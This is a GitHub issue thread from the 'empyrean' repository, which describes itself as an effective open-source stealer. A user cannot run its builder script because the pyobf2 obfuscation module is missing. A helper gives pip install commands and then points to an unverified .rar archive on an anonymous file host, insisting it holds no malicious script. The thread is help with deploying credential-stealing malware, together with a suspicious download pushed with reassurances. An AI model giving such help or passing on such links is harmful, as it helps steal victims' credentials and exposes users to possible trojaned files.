addi00000 / empyrean

Easy to use and open-source stealer that's super effective
MIT License
1.05k stars 348 forks source link

[BUG] Pyobf2.lib #182

Closed iAmScienceMan closed 1 year ago

iAmScienceMan commented 1 year ago

Describe the bug I have git and python installed, I tried installing pyobf2 through this website, but it still does not work.

To Reproduce Happens everytime I try to run

Expected behavior I expected this thing to run

Screenshots image

Additional context

Traceback (most recent call last): File "C:\Users\ahack\OneDrive\Desktop\Workspace\empyrean\builder.py", line 10, in import pyobf2.lib as obf ModuleNotFoundError: No module named 'pyobf2' Press any key to continue . . .

Wizz1337 commented 1 year ago

Hi, when you try to install the pyobf2 package did you get any error ? If yes, if error looks something like this : image

in this case you need python version 3.10 or +

iAmScienceMan commented 1 year ago

Hi, when you try to install the pyobf2 package did you get any error ? If yes, if error looks something like this : image

in this case you need python version 3.10 or +

I have the latest Python version 3.11.2 I even tried reinstalling Python… When installing pyobf2, I get this response: image

Wizz1337 commented 1 year ago

Can you try to do these commands? python3 -m pip install --upgrade pip pip install git+https://github.com/0x3C50/pyobf2.git

If that doesn't work, I'll ask you to download the .rar file below (you can check it does not contain any malicious script) and extract it to the project directory and it should work. image

.rar file : download link : https://anonfiles.com/K7meR3a1z1/pyobf2_rar direct download : https://cdn-152.anonfiles.com/K7meR3a1z1/a5f96aac-1677560269/pyobf2.rar

iAmScienceMan commented 1 year ago

Sorry for not responding, but I will do this as I come home